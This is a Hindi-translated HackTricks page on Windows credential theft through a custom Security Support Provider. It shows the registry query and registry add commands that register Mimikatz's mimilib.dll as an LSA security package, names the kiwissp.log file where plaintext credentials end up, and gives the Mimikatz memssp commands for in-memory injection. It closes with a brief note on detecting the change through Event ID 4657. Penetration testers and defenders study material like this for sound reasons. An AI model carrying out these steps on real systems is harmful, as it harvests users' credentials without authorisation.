hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
Translator workflow 75e8745ba3 Translated to Hindi
2023-11-06 08:38:02 +00:00

6.9 KiB

☁️ HackTricks क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥

कस्टम SSP

यहां जानें कि SSP (सुरक्षा समर्थन प्रदाता) क्या है।
आप अपना खुद का SSP बना सकते हैं ताकि मशीन तक पहुंच करने के लिए उपयोग की जाने वाली क्रेडेंशियल्स को स्पष्ट पाठ में कैप्चर कर सकें।

Mimilib

आप Mimikatz द्वारा प्रदान की गई mimilib.dll बाइनरी का उपयोग कर सकते हैं। इससे सभी क्रेडेंशियल्स को स्पष्ट पाठ में एक फ़ाइल में लॉग किया जाएगा।
डीएलएल को C:\Windows\System32\ में ड्रॉप करें
मौजूदा LSA सुरक्षा पैकेज की सूची प्राप्त करें:

{% code title="हमलावर@लक्ष्य" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

सुरक्षा समर्थन प्रदाता सूची (सुरक्षा पैकेज) में mimilib.dll जोड़ें:

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

और रीबूट के बाद सभी क्रेडेंशियल साफ पाठ में C:\Windows\System32\kiwissp.log में पाए जा सकते हैं।

मेमोरी में

आप इसे मेमोरी में सीधे Mimikatz का उपयोग करके इंजेक्ट कर सकते हैं (ध्यान दें कि यह थोड़ा अस्थिर/काम नहीं कर सकता है):

privilege::debug
misc::memssp

यह पुनर्बूट को नहीं सहेगा।

रोकथाम

इवेंट आईडी 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages के निर्माण/परिवर्तन की निगरानी करें।

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥